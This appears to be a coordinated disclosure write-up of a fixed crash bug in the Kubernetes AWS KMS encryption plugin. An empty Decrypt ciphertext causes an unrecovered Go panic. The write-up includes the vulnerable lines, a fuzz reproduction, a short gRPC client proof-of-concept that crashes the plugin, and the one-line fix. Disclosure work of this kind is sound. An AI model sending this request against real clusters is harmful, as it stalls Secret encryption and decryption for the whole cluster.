Empty-ciphertext panic in aws-encryption-provider (CVD with AWS)


Severity	Medium (per AWS VDP)
Asset	`kubernetes-sigs/aws-encryption-provider`
CVE	None assigned

TL;DR (for the non-Go-fluent reader)

The plugin that lets Kubernetes encrypt its Secret objects at rest with AWS KMS could be crashed by anyone who could talk to its local socket. On a healthy control-plane node that’s only the Kubernetes API server itself — but it also covers any other process that gained local access to that socket (a sidecar with the socket mounted, a co-tenant on the control plane, a misconfigured permission). A single decrypt request containing an empty bytes field hit an unchecked array read; Go panicked; because nothing on the call path called recover(), the whole plugin process died. While it restarted, the API server could not encrypt or decrypt any Secret — operations that touch Secret storage stalled cluster-wide.

We reported it to AWS via HackerOne. AWS confirmed the issue does not affect their managed services (the conditions to trigger it aren’t present in their managed environment, and architectural safeguards further limit impact), and engaged the upstream maintainers. The fix shipped in the open-source repo as a one-line length guard. Disclosed coordinated with AWS.

What the tool actually is

kubernetes-sigs/aws-encryption-provider is the Kubernetes KMS plugin AWS publishes for envelope-encrypting Secret objects against AWS KMS. It runs as a gRPC server on a Unix domain socket on the control-plane node, speaks the Kubernetes KMS provider protocol (both v1 and v2), and proxies Encrypt / Decrypt calls to AWS KMS. kube-apiserver calls it whenever it writes or reads a Secret.

A single process serves both V1 and V2 APIs on the same grpc.Server instance — a detail that matters once you start crashing it.

flowchart LR
  S[etcd]:::n
  A[kube-apiserver]:::accent
  P["aws-encryption-provider
gRPC on /var/run/kmsplugin/socket.sock"]:::accent
  K[AWS KMS]:::n
  A -- "Encrypt/Decrypt RPC
(unix socket, no auth)" --> P
  P -- "kms:Encrypt / kms:Decrypt
(IAM-signed)" --> K
  A <--> S
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3

The gRPC server has no auth layer of its own. Access is controlled by Unix socket filesystem permissions only.

The bug — V1 path

File: pkg/plugin/plugin.go:179 at the affected commit 4341c70.

func (p *V1Plugin) Decrypt(ctx context.Context, request *pb.DecryptRequest) (*pb.DecryptResponse, error) {
    zap.L().Debug("starting decrypt operation")

    startTime := time.Now()
    if string(request.Cipher[0]) == kmsplugin.StorageVersion { // <-- LINE 179: PANIC if len == 0
        request.Cipher = request.Cipher[1:]
    }
    // ...
}

Encrypt() at line 169 of the same file prepends a storage-version prefix byte (0x31 / ASCII '1'):

return &pb.EncryptResponse{Cipher: append([]byte(kmsplugin.StorageVersion), result.CiphertextBlob...)}, nil

Decrypt() then expects to strip that prefix. The assumption is that any ciphertext seen by Decrypt() came from a prior Encrypt() call and is therefore non-empty. The gRPC layer makes no such guarantee — the Cipher field is a protobuf bytes value, deserialised to a Go []byte that can be either nil or []byte{}. Indexing request.Cipher[0] against either of those crashes the process.

The bug — V2 path

File: pkg/plugin/plugin_v2.go:182.

Structurally the same; idiom is slightly different (a type conversion, not a string compare):

storageVersion := kmsplugin.KMSStorageVersion(request.Ciphertext[0]) // LINE 182 — same panic, V2 path

V1 and V2 are registered on the same grpc.Server instance, so crashing either one tears down both. We reported them as two separate HackerOne reports to keep the fix targets crisp; the maintainers patched them together in one PR.

Why this kills the whole process

A Go panic in a goroutine without a recover() on the call stack terminates the entire process. The gRPC server dispatches each request to a goroutine spawned by serveStreams, and nothing in aws-encryption-provider registers a recovery interceptor. The actual stack trace from the reproducer:

panic: runtime error: index out of range [0] with length 0
  sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
  k8s.io/kms/apis/v1beta1._KeyManagementService_Decrypt_Handler
  google.golang.org/grpc.(*Server).processUnaryRPC
  google.golang.org/grpc.(*Server).handleStream
  google.golang.org/grpc.(*Server).serveStreams.func2.1   <- unrecovered goroutine

flowchart TB
  D["(*V1Plugin).Decrypt
request.Cipher[0]"]:::accent
  H["_KeyManagementService_Decrypt_Handler
(generated code)"]:::n
  P["grpc.(*Server).processUnaryRPC"]:::n
  S["grpc.(*Server).handleStream"]:::n
  G["grpc.(*Server).serveStreams.func2.1
goroutine — no recover()"]:::alert
  E["process exits
plugin pod restarts"]:::alert
  D -- panic --> H --> P --> S --> G --> E
  classDef n fill:#1A1A1C,stroke:#2A2A2D,color:#EDEAE3
  classDef accent fill:#0A0A0B,stroke:#FF4A1C,color:#EDEAE3
  classDef alert fill:#0A0A0B,stroke:#E8342B,color:#EDEAE3

This is the difference between “a request fails” and “the daemon dies.”

Reproduction

The bug was found by fuzz testing. The harness uses cloud.KMSMock{}, so no AWS credentials are needed for either method.

Method 1 — direct fuzz harness. Empty []byte{} is registered as seed#0, which means the panic fires on the very first seed before the fuzzer generates any new inputs:

git clone https://github.com/kubernetes-sigs/aws-encryption-provider
cd aws-encryption-provider
git checkout 4341c70
go test -fuzz FuzzV1Decrypt -fuzztime 1x ./pkg/plugin/ 2>&1 | tail -20

--- FAIL: FuzzV1Decrypt (0.00s)
    --- FAIL: FuzzV1Decrypt/seed#0 (0.00s)
panic: runtime error: index out of range [0] with length 0
  sigs.k8s.io/aws-encryption-provider/pkg/plugin.(*V1Plugin).Decrypt
        .../pkg/plugin/plugin.go:179 +0x7e4
FAIL sigs.k8s.io/aws-encryption-provider/pkg/plugin

Method 2 — live gRPC client over Unix socket. Proves the crash through the full gRPC dispatch path, not just the in-process panic:

conn, _ := grpc.Dial("unix:///var/run/kmsplugin/socket.sock", grpc.WithInsecure())
client := pb.NewKeyManagementServiceClient(conn)
// Crashes the server:
client.Decrypt(context.Background(), &pb.DecryptRequest{Cipher: []byte{}})

The V2 path repro is identical, with v2pb.NewKeyManagementServiceClient and &v2pb.DecryptRequest{Ciphertext: []byte{}}.

The fix — PR #169

kubernetes-sigs/aws-encryption-provider#169, opened 2026-04-29, merged 2026-04-30. A pure defensive guard. No logic change, no new behaviour. Two parallel five-line additions:

// pkg/plugin/plugin.go (V1)
if len(request.Cipher) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}

// pkg/plugin/plugin_v2.go (V2)
if len(request.Ciphertext) == 0 {
    return nil, errors.New("invalid empty ciphertext")
}

Plus four new tests — TestDecryptEmptyCipher, TestDecryptNilCipher, TestDecryptEmptyCiphertextV2, TestDecryptNilCiphertextV2 — each asserting that the error contains "invalid empty ciphertext" for both the nil and []byte{} cases.

AWS’s response, paraphrased: the issue does not impact AWS-managed services or their customers (the component operates in a managed environment where the conditions to trigger this behaviour are not present, and architectural safeguards further limit any potential impact). As an open-source component used by the broader community, AWS engaged the upstream service team to address it.

Calibrated impact

We’re not calling this an RCE and we’re not calling it critical:

An unrecovered Go panic kills the plugin process. While it restarts, kube-apiserver cannot encrypt new Secrets or decrypt existing ones — operations that touch Secret storage stall.
Trigger requires the ability to send a gRPC Decrypt to the plugin’s local Unix socket. On a healthy control-plane node, that’s the local kube-apiserver. Real-world exposure is limited to scenarios where another local process can reach the socket: misconfigured socket permissions, a sidecar with the socket mounted, or a compromised co-tenant on the control plane.
This is not a remote, unauthenticated, internet-facing bug.
AWS-managed services not affected (per AWS VDP).

A reliability fix that AWS happily landed upstream, exactly because the behaviour was wrong even though the production exposure was constrained.

Timeline

Date (UTC)	Event
2026-03-22	Reported to AWS VDP via HackerOne (#3620748, #3620753)
2026-03-30	Triaged; severity set Medium (downgraded from initial High 7.5)
2026-04-29	Upstream PR #169 opened
2026-04-30	PR #169 merged
2026-05-28	AWS VDP marked reports Resolved
2026-05-28	Reports publicly disclosed on HackerOne
2026-05-29	This writeup published

Two bytes. Months of CVD. That’s how this work usually goes.

— Syntetisk research (misop00p)